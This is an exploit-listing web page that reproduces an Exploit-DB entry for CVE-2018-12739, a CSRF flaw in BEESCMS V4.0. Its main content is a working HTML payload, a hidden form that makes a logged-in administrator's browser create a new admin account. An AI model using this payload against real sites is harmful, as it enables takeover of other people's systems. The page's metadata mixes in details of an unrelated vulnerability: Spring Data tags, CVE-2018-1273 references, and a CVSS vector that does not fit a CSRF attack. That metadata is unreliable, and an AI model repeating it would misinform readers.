header-logo
Suggest Exploit
vendor:
BEESCMS
by:
bay0net
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: BEESCMS
Affected Version From: BEESCMS - V4.0
Affected Version To: BEESCMS - V4.0
Patch Exists: NO
Related CWE: CVE-2018-12739
CPE: a:beescms:beescms:4.0
Metasploit:
Other Scripts:
Tags: cve,cve2018,vmware,rce,spring,kev
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://nvd.nist.gov/vuln/detail/CVE-2018-1273https://pivotal.io/security/cve-2018-1273http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/CAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU0f2J_1i4p46zQmail.gmail.comhttps://www.oracle.com/security-alerts/cpujul2022.html
Nuclei Metadata: {'max-request': 2, 'vendor': 'pivotal_software', 'product': 'spring_data_commons'}
Platforms Tested:
2018

CSRF vulnerability in BEESCMS_V4.0

A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.

Mitigation:

Implement anti-CSRF tokens and proper input validation.
Source

Exploit-DB raw data:

# Exploit Title: A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
# Date: 2018-06-25
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9226389.html
# Software Link: http://www.beescms.com/
# Version: BEESCMS - V4.0
# CVE : CVE-2018-12739

A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.

The payload for attack is as follows.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/beescms/admin/admin_admin.php?nav=list_admin_user&admin_p_nav=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="admin_name" value="test1" />
      <input type="hidden" name="admin_password" value="test1" />
      <input type="hidden" name="admin_password2" value="test1" />
      <input type="hidden" name="admin_nich" value="test1" />
      <input type="hidden" name="purview" value="1" />
      <input type="hidden" name="admin_admin" value="" />
      <input type="hidden" name="admin_mail" value="" />
      <input type="hidden" name="admin_tel" value="" />
      <input type="hidden" name="is_disable" value="0" />
      <input type="hidden" name="action" value="save_admin" />
      <input type="hidden" name="submit" value="确定" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR